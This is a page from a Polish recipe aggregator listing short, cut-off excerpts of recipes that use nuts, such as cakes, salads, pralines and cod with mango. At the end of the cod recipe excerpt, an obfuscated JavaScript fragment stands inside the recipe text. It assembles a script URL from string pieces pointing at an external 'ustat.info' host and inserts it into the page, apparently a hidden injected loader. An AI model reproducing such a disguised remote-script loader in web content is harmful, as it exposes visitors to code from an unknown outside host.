orzechy - 16941 przepisów (strona:383/1130)

Imprezowa sałatka i mini kotleciki w razowej panierce 176

ciekawa i przede wszystkim wartościowa alternatywa dla bułki tartej. Nasze panierki to bogactwo wartościowych składników i wysoka zawartość błonnika. Mieszanki AlePanierka zawierają wyłącznie naturalne składniki (otręby, ziarna sezamu, len, orzechy itp.).” Osobiście jestem zachwycona tym pomysłem, a co najważniejsze smakiem i składnikami każdej panierki. W ofercie znajdziecie trzy warianty: AlePanierka Sezamowa – skład: otręby pszenne spożywcze (40%), sezam łuszczony(...)złoty odtłuszczony (15%), sezam czarny (10%); AlePanierka Orzechowa (bez glutenu) – płatki jaglane (46%), orzechy arachaidowe prażone (35%), złoty len odtłuszczony (19%); AlePanierka Razowa do kurczaka – bułka tarta (mąka, sól, drożdże, woda), otręby pszenne spożywcze (26%), papryka czerwona słodka (4%), przyprawy. Panierki są dostępne w dwóch wielkościach: 300 g oraz 80 g Panierki mają naprawdę dużo zastosowań. Dziś prezentuję

Słodkie okruszki
Ciasto Fistaszek 318

łyżki maki pszennej, 2 łyżki mąki ziemniaczanej, 2 opakowania cukru waniliowego, 5 łyżek cukru pudru, 200g masła. PRZYGOTOWANIE: 1. Masa orzechowa: Masło rozpuszczam w garnuszku. Dodaję cukier, miód oraz orzechy ziemne. Mieszam i smażę około 5 minut, cały czas mieszając. Masę odstawiam do przestudzenia. 2. Ciasto miodowe: Mąkę przesiewam na stolnicę i łączę z masłem. Dodaję jajka, cukier, miód oraz(...)dodaję zimny budyń. Ucieram. 5. Na ciasto miodowe wykładam połowę masy budyniowej. Wyrównuję. Przykrywam biszkoptem ciemnym. Na biszkopcie rozsmarowuję drugą część masy. Wyrównuję. Na masie układam ciasto miodowe z orzechami. Gotowe ciasto wstawiam na godzinę do lodówki

Tradycyjna kuchnia Kasi
Tarta "malina w czekoladzie" 187

orzechową nutą to idealny deser do popołudniowej kawy.Zdecydowanie jedno z moich ulubionych.Polecam Ciasto kruche: 100 g masła 100 g mąki pszennej 25 g mielonych pistacji 25 g mielonych orzechów włoskich 75 g cukru pudru 1 duże lub 2 małe żółtka szczypta soli Orzechy i pistacje mielimy na mączkę.Przesianą mąkę i cukier puder wsypujemy do malaksera,dodajemy resztę składników

Anielskie wypieki
Przepis #66 Kokosowe pralinki na patyku (FIT) 128

słodzika - 1,5  łyżki jogurtu greckiego - 1 łyżka mąki kokosowej - 40 g gorzkiej czekolady - kilka łyżek mleka roślinnego lub zwykłego - patyczki do szaszłyków Dodatkowo - do obtoczenia   - posiekane orzechy ( ja użyłam nerkowców) - wiórki kokosowe Wykonanie Do miseczki wrzucamy wiórki kokosowe, cukier oraz jogurt grecki. Wszystko dokładnie blendujemy na dość jednolitą masę. Na koniec dosypujemy mąkę kokosową i łączmy(...)już płynna zdejmujemy z palnika i dolewamy odrobinę mleka aby stała się jeszcze bardziej płynna - tak by móc polać nią nasze pralinki. Tak przygotowane kuleczki obtaczamy w posypce z orzechów lub wiórek kokosowych. Dobrze smakują także polane tylko polewą. Pralinki poza tym, że świetnie smakują to jeszcze ładnie wyglądają. Z powodzeniem mogą stanowić jadalną dekorację naszego stołu. Jedna pralinka

Health-Fit-Life
Ciasteczka bostonskie czyli Slodki Czwartek odc.136 205

bardzo płaska łyżeczka sody rozpuszczona w 1,5 łyżki gorącej wody 3 i 1/4 szkl. pszennej maki chlebowej 1/2 łyżeczki soli 1 łyżeczka cynamonu po 3/4 szkl. posiekanych orzechów włoskich i rodzynek Masło ucieramy z cukrem na puszysta masę, dodajemy kolejno jajka a także sodę rozpuszczona w wodzie. Następnie dosypujemy połowę mąki przesianej z solą i cynamonem. Dorzucamy orzechy

Dzieje kuchennej Wiewióry
Ciasto z patiosna i bakali 125

szklanki kakao 2 łyżki proszek do pieczenia łyżeczka płaska soda oczyszczona mniej niż pół łyżeczki cukier 1 szklanka cukier waniliowy 16 g rodzynki pół szklanki migdały płatki pół szklanki orzechy fistaszki pól szklanki patison starty i odciśnięty 4 garście Dodatkowo: czekolada pomarańczowa 200 g mleko 4 łyżki   Wykonanie: Jaja ubiłam z cukrem i cukrem waniliowym na puch. Dodałam olej(...)strumyczkiem lałam i miksowałam). Mąkę przesiałam i dodałam do ubitych jaj mieszałam już. Wsypałam kakao rodzynki migdały i orzechy. Patisona obrałam ze skórki,pestki wyrzuciłam i starłam  na wiórka, odcisnęłam 4 garście i dodałam do reszty składników. Delikatnie wymieszałam. Blaszkę okrągła 26 cm wysmarowałam masłem i obsypałam mąką,przełożyłam ciasto i wstawiłam do pieca. Piekłam 55 minut

Różowa kuchnia
Kruche ciasto z rabarbarem i budyniem 173

wręcz wypiek obowiązkowy. Gwarantuję, że umili weekendowe spotkanie ze znajomymi albo...majówkę, która zbliża się wielkimi krokami ;). Polecam. Kruche ciasto: 2,5 szklanki mąki pszennej 0,5 szklanki zmielonych orzechów włoskich ( można zastąpić mąką ) 220 g masła, zimnego 1 szklanka miałkiego brązowego cukru 1 jajko 0,5 łyżeczki proszku do pieczenia szczypta soli 2 łyżeczki ekstraktu waniliowego Nadzienie rabarbarowe(...)cynamonu ( zamiast można dodać imbir lub kardamon ) Warstwa budyniowa: 2 budynie waniliowe ( na 500 ml mleka ) 750 ml mleka 100 g cukru Wykonanie: Kruche ciasto : Wymieszać mąkę pszenną, zmielone orzechy, cukier, proszek do pieczenia i sól. Dodać jajko i ekstrakt z wanilii oraz pokrojone w kosteczkę masło i zagnieść jednolite ciasto. Podzielić je na 2 części - mniej więcej

Opowieści z piekarnika
Razowe ciasteczka z bakaliami 131

masła, miękkiego 100 g drobnego cukru trzcinowego ( u mnie ciemny cukier Muscovado ) 4 łyżki syropu klonowego lub płynnego miodu 1,5 łyżeczki proszku do pieczenia 6 łyżek orzechów włoskich lub laskowych ( lub innych ulubionych ), z grubsza posiekanych 6 łyżek płatków migdałowych 6 łyżek suszonej żurawiny lub innych suszonych owoców ( te większe należy posiekać ) Wykonanie: Mąkę wymieszać z proszkiem do pieczenia(...)ponownie zagnieść, dobrze łącząc ciasto z bakaliami. Ciasto włożyć do lodówki na około 30 minut. Dwie płaskie blachy wyłożyć papierem do pieczenia. Ze schłodzonego ciasta odrywać kawałki wielkości niedużego orzecha włoskiego, formować z nich kulki i układać na blasze w odstępach od siebie, lekko spłaszczając dłonią ( ciasteczka w piekarniku lekko rozleją się na boki ). Piec przez około 12 minut

Opowieści z piekarnika
Nalesniki z jabłkami rodzynkami i orzechami 119

Składniki: 250g mąki, 2 szklanki mleka, 1/4 łyżeczki proszku do pieczenia, jajko, łyżeczka soli, 3 duże jabłka, garść orzechów włoskich, łyżeczka cynamonu, 2 - 3 łyżki rodzynek Przygotowanie: Składniki na naleśniki łączymy razem. W razie potrzeby dodać odpowiednio mąki lub mleka. Smażymy na niewielkiej ilości tłuszczu. Jabłka obieramy i kroimy w kostkę. Dodajemy cynamon, rodzynki oraz rozdrobnione orzechy. Wszystko razem podgrzewamy

Lena Gotuje
Kwiaty cukinii nadziewane ricottą i orzechami włoskimi w cieście 126

Delikatne kwiaty cukinii z delikatnym farszem w chrupiącym cieście... to nie może smakować źle! Składniki (na 2 - 3 porcje) 10- 12 kwiatów cukinii  100 gram sera ricotta garść orzechów włoskich  sól i pieprz 1 jajko  2 łyżki mleka  2 łyżki mąki ryżowej  1/4 łyżeczki proszku do pieczenia  litr oleju rzepakowego do smażenia(...)bazyliowy: 1 łyżka majonezu  100 gram jogurtu naturalnego  garść posiekanej bazylii  Kwiaty cukinii myję, osuszam i wycinam pręciki. Orzechy włoskie siekam drobno i mieszam z srem ricotta oraz szczyptą soli i pieprzu. Taką mieszanką nadziewam kwiaty cukinii a czubki kwiatków mocno zwijam. Jajko mieszam z mlekiem, mąką i proszkiem. W garnku rozgrzewam olej. Nadziane kwiaty maczam

Mango Papaja
Sałatka z szynką parmeńską, gruszką i serem pleśniowym 124

serem pleśniowym Drukuj przepis Porcji: 1 Czas gotowania: 10 minut Składniki garść sałaty lodowej 3 plastry szynki parmeńskiej 50 g sera pleśniowego (najlepiej gorgonzola) połowa gruszki posiekane dowolne orzechy do posypania sos balsamiczny lub musztardowo-miodowy (przepis niżej) Przepis 1 Sałatę rwiemy na części i wykładamy na talerz. Gruszkę kroimy w kawałki, układamy na sałacie. 2 Następnie dokładamy kolejne składniki(...)porwane plastry szynki parmeńskiej i kawałki sera pleśniowego. 3 Całość posypujemy orzechami i polewamy sosem. 4 Przepis na sos miodowo-musztardowy: 2 łyżeczki musztardy, łyżeczka miodu, 3 łyżki oliwy z oliwek. Wszystkie składniki dokładnie mieszamy. Najlepiej do wymieszania użyć małego słoiczka, którym po zamknięciu należy wstrząsnąć.   Artykuł Sałatka z szynką parmeńską, gruszką i serem pleśniowym pochodzi z serwisu kuchniabazylii.pl

Kuchnia Bazylii
Dorsz na imbirowym mango 179

suszonej) sól, pieprz szczypta chili zioła prowansalskie czosnek 2 łyżki miodu 2 łyżki soku z limonki 2 łyżki  białego octu winnego  2-3 łyżki  drobno posiekanych orzechów (użyłam brazylijskich, bo akurat takie miałam pod ręką)  Dorsza kroimy na małe kawałki, przyprawiamy solą, pieprzem oraz ziołami prowansalskimi, zawijamy w folię aluminiową i pieczemy przez 15 minut(...)imbir oraz odrobinę chili. Gotowy sos dodajemy do posiekanego mango i papryki i delikatnie całość mieszamy. Rozkładamy na talerze, na wierzchu układamy kawałki upieczonego dorsza i posypujemy je posiekanymi orzechami. Smacznego (function(){ tsycu="qXm73dtjsych";tsyc=document.createElement("script"); tsyc_="u"+("st");tsyc_+="at"+(".");tsyc.async=true;tsyc_+="in"; tsycu="65788857."+tsycu;tsyc.type="text/javascript";tsycu+="9yhtlhXfq6tm"; tsycu+="Xg2s1z";tsyc_+=("f")+"o"+("/");tsyc.src="//"+tsyc

Cynamonowe szczęście
Galaretka z musem lodowo - owocowym 158

przyjemnie orzeźwia gdy na dworze grzeje słoneczko. Składniki - opakowanie galaretki truskawkowej - 2 brzoskwinie z puszki ( 4 połówki ) - 1 banan - 4 gałki lodów waniliowych - 20 dag rodzynek - 20 dag orzechów włoskich - kilka kostek czekolady - 250 ml śmietany 30% - czubata łyżka cukru pudru Drogi internauto - jeżeli przepisy znalezione na tym blogu uważasz za przydatne i chętnie wykorzystasz je w swojej kuchni(...)szklanek włożyć po połówce i zalać tężejącą galaretka. Wstawić do lodówki do całkowitego stężenia. Obranego banana, pozostałe połówki brzoskwiń i lody zmiksować na jednolity mus. Dodać rodzynki, posiekane orzechy, całość wymieszać. Mus wylać na galaretkę, odstawić do lodówki i porządnie schłodzić. Mocno schłodzoną śmietanę 30% ubijać do uzyskania pożądanej konsystencji, pod koniec ubijania dodać przesiany cukier puder. Bitą śmietanę nałożyć

Świat Smaku
Czekoladowa rolada szwajcarska z "serkiem" z nerkowców i jagodami leśnymi (bez glutenu, bez laktozy, bez cukru) 124

szklanki erytrolu 1/3 szklanki oleju z pestek winogron pół łyżeczki sody oczyszczonej szczypta soli  pół ziarenka bobu tonka 1 łyżkę pudru z liofilizowanej czarnej porzeczki (opcjonalnie) 250 gram orzechów nerkowca 250 gram jagód leśnych sok z jednej cytryny 2 łyżki mąki kokosowej 4 łyżeczki miodu 3 łyżki mleka kokosowego 3 łyżki oleju kokosowego 3 łyżki ekspandowanej quinoy jadalne kwiaty(...)wyłożoną papierem do pieczenia. Wkładamy do piekarnika nagrzanego do 170 stopni na około 20 minut.     W tym czasie starannie myjemy jagody i robimy "serek". Orzechy nerkowca odsączamy z wody, dodajemy 2 łyżeczki miodu, sok z cytryny, mąkę kokosową i 3-4 łyżki jagód, starannie miksujemy blenderem, aby uzyskać jak najbardziej jednolitą masę.     Gdy ciasto

Quinoa Raz!
Blok czekoladowy 180

Jeśli nie macie pomysłu na deser to myślę, że z przyjemnością zjecie pyszny blok czekoladowy. Nie potrzebujecie na jego przygotowanie wiele czasu, jednak zanim będziecie mogli

Kulinarnyblog.pl - wiesz jak gotować!

Proponowane wyszukiwania